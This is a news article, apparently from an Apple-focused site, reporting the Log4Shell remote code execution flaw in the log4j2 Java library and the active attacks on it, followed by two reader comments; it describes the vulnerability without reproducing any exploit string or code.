A critical zero day exploit found in the popular Java logging library log4j2 is under active attack. The exploit affects numerous services and companies including Apple iCloud, Minecraft, Steam, Twitter, Baidu, Tencent, Amazon, Tesla and likely many more.
Lunasec reports...
A few hours ago, a 0-day exploit in the popular Java logging library log4j2 was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short (CVE-2021-44228 just isn't as memorable).
A proof of concept was shared on GitHub, alongside screenshots demonstrating iCloud's exposure.
Another proof of concept uses a change of your iPhone name to demonstrate the vulnerability. Lunasec notes that this only shows the vulnerability exists on iPhones but at this time there is no known remote method of triggering it.
Deutsche Telekom also confirmed that its logs show active attacks underway.
"We are observing attacks in our honeypot infrastructure coming from the TOR network."
Would you like to be notified when someone replies or adds a new comment?
Yes (All Threads)
Yes (This Thread Only)
No
Notifications
Would you like to be notified when we post a new Apple news article or tutorial?
Yes
No
Comments (2)
Comments are closed for this article.
0
LeoNyx86 - December 12, 2021 at 10:27am
Maybe personal details and data that belongs to a person should be deleted everywhere online. And it should be kept on an offline storage device like a swipe card. The only data that should be stored online are the card key numbers encrypted and jumbled. Or that any data online cannot be accessed without the card, by the person or anyone else.
The cards would feature biometric security such as fingerprints, bio-impedance, an active pulse. Maybe a palm scanner with a lie detector and a Face ID including iris scanner with a lie detector.
You would be asked three questions or such. And the voice recognition would also feature an authentication and lie detector.
You have to pass all tests to gain access.
0
A-Non-E-Moose - December 11, 2021 at 12:12am
Is this the same one that affected much of AWS on Dec8th?
![OpenAI Launches Codex App for Mac With Multi-Agent Coding [Video]](/images/news/99820/99820/99820-160.jpg "OpenAI Launches Codex App for Mac With Multi-Agent Coding [Video]")
![iPhone Fold Tipped to Feature Largest Battery in iPhone History and New Button Layout [Report]](/images/news/99813/99813/99813-160.jpg "iPhone Fold Tipped to Feature Largest Battery in iPhone History and New Button Layout [Report]")
![Apple TV Renews 'Your Friends & Neighbors' for Season 3, Shares Season 2 Teaser [Video]](/images/news/99812/99812/99812-160.jpg "Apple TV Renews 'Your Friends & Neighbors' for Season 3, Shares Season 2 Teaser [Video]")
![Beats Powerbeats Pro 2 Drop to $199.95 [Deal]](/images/news/99815/99815/99815-160.jpg "Beats Powerbeats Pro 2 Drop to $199.95 [Deal]")
![Apple Watch Series 11 Drops Back to All-Time Low of $299 [Deal]](/images/news/99283/99283/99283-160.jpg "Apple Watch Series 11 Drops Back to All-Time Low of $299 [Deal]")
![Apple AirPods 4 With Active Noise Cancellation Drop to $119 [Deal]](/images/news/99794/99794/99794-160.jpg "Apple AirPods 4 With Active Noise Cancellation Drop to $119 [Deal]")
![AirPods Pro 3 Return to All-Time Low Price of $199 [Deal]](/images/news/99752/99752/99752-160.jpg "AirPods Pro 3 Return to All-Time Low Price of $199 [Deal]")
![Apple's 13-Inch M5 iPad Pro (Silver) Hits New All-Time Low at $1,149.99 [Deal]](/images/news/99729/99729/99729-160.jpg "Apple's 13-Inch M5 iPad Pro (Silver) Hits New All-Time Low at $1,149.99 [Deal]")
